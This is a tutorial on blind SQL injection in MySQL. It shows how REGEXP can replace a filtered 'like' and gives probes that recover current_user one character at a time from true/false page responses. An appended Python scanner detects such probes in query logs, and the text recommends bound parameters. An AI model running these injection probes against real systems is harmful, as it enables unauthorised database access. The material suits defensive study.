0x00 Overview

Injection method when "like" is not allowed

REGEXP can provide the same functionality as like.

Usage: expression REGEXP '^condition' is equivalent to expression like 'condition%'

0x01 Test data

  mysql> select user();
  +----------------+
  | user() |
  +----------------+
  | root@localhost |
  +----------------+
  1 row in set (0.00 sec)

  mysql> select current_user;
  +----------------+
  | current_user |
  +----------------+
  | root@localhost |
  +----------------+
  1 row in set (0.00 sec)

  mysql> select * from users where id=48;
  +----+------------------------------+----------+-----+----------+------+--------+---------------------+---------------------+
  | id | unionid | nickname | sex | province | city | avatar | created_at | updated_at |
  +----+------------------------------+----------+-----+----------+------+--------+---------------------+---------------------+
  | 48 | oBjot1NCTkmEiaL-o-TAZD4npHUg | "ZOO" | 1 | 广东 | 珠海 | NULL | 2018-10-06 17:15:39 | 2018-10-06 17:15:39 |
  +----+------------------------------+----------+-----+----------+------+--------+---------------------+---------------------+
  1 row in set (0.00 sec)

0x02 Tests

  -- Correct case
  -- The original row is returned and the page stays unchanged
  mysql> select * from users where id=48 and '1' REGEXP '^1';
  +----+------------------------------+----------+-----+----------+------+--------+---------------------+---------------------+
  | id | unionid | nickname | sex | province | city | avatar | created_at | updated_at |
  +----+------------------------------+----------+-----+----------+------+--------+---------------------+---------------------+
  | 48 | oBjot1NCTkmEiaL-o-TAZD4npHUg | "ZOO" | 1 | 广东 | 珠海 | NULL | 2018-10-06 17:15:39 | 2018-10-06 17:15:39 |
  +----+------------------------------+----------+-----+----------+------+--------+---------------------+---------------------+
  1 row in set

  -- Querying current_user, correct case
  -- The original row is returned and the page stays unchanged, which shows that the first character of current_user is "r"
  mysql> select * from users where id=48 and current_user REGEXP '^r';
  +----+------------------------------+----------+-----+----------+------+--------+---------------------+---------------------+
  | id | unionid | nickname | sex | province | city | avatar | created_at | updated_at |
  +----+------------------------------+----------+-----+----------+------+--------+---------------------+---------------------+
  | 48 | oBjot1NCTkmEiaL-o-TAZD4npHUg | "ZOO" | 1 | 广东 | 珠海 | NULL | 2018-10-06 17:15:39 | 2018-10-06 17:15:39 |
  +----+------------------------------+----------+-----+----------+------+--------+---------------------+---------------------+
  1 row in set

  -- Querying current_user, correct case
  -- The original row is returned and the page stays unchanged, which shows that the second character of current_user is "o"
  mysql> select * from users where id=48 and current_user REGEXP '^ro';
  +----+------------------------------+----------+-----+----------+------+--------+---------------------+---------------------+
  | id | unionid | nickname | sex | province | city | avatar | created_at | updated_at |
  +----+------------------------------+----------+-----+----------+------+--------+---------------------+---------------------+
  | 48 | oBjot1NCTkmEiaL-o-TAZD4npHUg | "ZOO" | 1 | 广东 | 珠海 | NULL | 2018-10-06 17:15:39 | 2018-10-06 17:15:39 |
  +----+------------------------------+----------+-----+----------+------+--------+---------------------+---------------------+
  1 row in set

  -- Wrong case
  -- The page throws an error; if error display is turned off, the page returns no data
  mysql> select * from users where id=48 and current_user REGEXP '^aa';
  Empty set
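As an added example that is not part of the original post, the following Python script shows what the REGEXP-for-like substitution and the step-by-step tests above look like from the defender's side: it scans MySQL general-query-log lines and flags REGEXP/RLIKE comparisons whose left operand is a string literal (a tautology probe such as '1' REGEXP '^1') or a server value such as current_user, and additionally flags anchored patterns that grow by one character on the same operand within one connection, which is the signature of the character-by-character recovery shown in 0x02. The log lines are constructed to replay those probes, the log format is the general-query-log layout and the regex-based statement parser is an assumption rather than a full SQL parser.

```python
import re
from collections import defaultdict

# Constructed sample lines in MySQL general-query-log layout (not taken from the post).
# Thread 12 replays the probes from the tests above; thread 13 is a benign prefix search.
SAMPLE_LOG = """\
2018-10-06T09:15:39.000000Z   12 Query  select * from users where id=48
2018-10-06T09:15:40.000000Z   12 Query  select * from users where id=48 and '1' REGEXP '^1'
2018-10-06T09:15:41.000000Z   12 Query  select * from users where id=48 and current_user REGEXP '^r'
2018-10-06T09:15:42.000000Z   12 Query  select * from users where id=48 and current_user REGEXP '^ro'
2018-10-06T09:15:43.000000Z   12 Query  select * from users where id=48 and current_user REGEXP '^aa'
2018-10-06T09:15:44.000000Z   13 Query  select id, nickname from users where nickname REGEXP '^Z'
2018-10-06T09:15:45.000000Z   13 Query  select * from users where id=49
"""

LOG_LINE = re.compile(r"^(?P<ts>\S+)\s+(?P<thread>\d+)\s+Query\s+(?P<sql>.*)$")

# Left operand is a quoted string literal or a bare identifier / zero-argument function call.
REGEXP_USE = re.compile(
    r"(?P<lhs>'[^']*'|[\w@.]+(?:\(\))?)\s+(?:NOT\s+)?(?:REGEXP|RLIKE)\s+'(?P<pat>[^']*)'",
    re.IGNORECASE,
)

# Server-side values an application query has no reason to pattern-match in a WHERE clause.
SERVER_VALUES = {"current_user", "current_user()", "user()", "session_user()",
                 "system_user()", "version()", "database()", "schema()", "@@version"}


def classify(sql):
    """Return (kind, lhs, pattern) for each REGEXP/RLIKE comparison in one statement."""
    out = []
    for m in REGEXP_USE.finditer(sql):
        lhs = m.group("lhs").lower()
        pat = m.group("pat")
        if lhs.startswith("'"):
            out.append(("literal-vs-literal", lhs, pat))   # '1' REGEXP '^1': tautology probe
        elif lhs in SERVER_VALUES:
            out.append(("server-value-probe", lhs, pat))   # current_user REGEXP '^r'
        else:
            out.append(("column-match", lhs, pat))         # ordinary prefix search on a column
    return out


def extends_or_sibling(prev, pat):
    """True when pat extends prev by one character ('^r' -> '^ro') or replaces only its last
    character ('^ra' -> '^rb'), the two moves of a character-by-character recovery."""
    if len(pat) == len(prev) + 1 and pat.startswith(prev):
        return True
    return len(pat) == len(prev) >= 2 and pat[:-1] == prev[:-1]


def scan_log(text):
    """Emit one alert per suspicious REGEXP use and one per enumeration step on the same
    operand within the same connection thread."""
    alerts = []
    last_pat = defaultdict(dict)   # thread -> lhs -> last anchored pattern seen
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue
        thread, sql = m.group("thread"), m.group("sql")
        for kind, lhs, pat in classify(sql):
            if kind != "column-match":
                alerts.append({"thread": thread, "kind": kind, "lhs": lhs, "pattern": pat})
            if pat.startswith("^"):
                prev = last_pat[thread].get(lhs)
                if prev is not None and extends_or_sibling(prev, pat):
                    alerts.append({"thread": thread, "kind": "prefix-enumeration",
                                   "lhs": lhs, "pattern": pat})
                last_pat[thread][lhs] = pat
    return alerts


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert)
```

On the constructed log the scanner raises five alerts, all on thread 12: the literal-versus-literal probe, the three current_user probes, and one prefix-enumeration alert when '^r' becomes '^ro'; the prefix search on the nickname column in thread 13 is classified as an ordinary column match and stays silent. The underlying fix on the application side is unchanged by the REGEXP trick: the id value in the examples should reach the database as a bound parameter, so that neither like nor REGEXP can be appended to the WHERE clause at all.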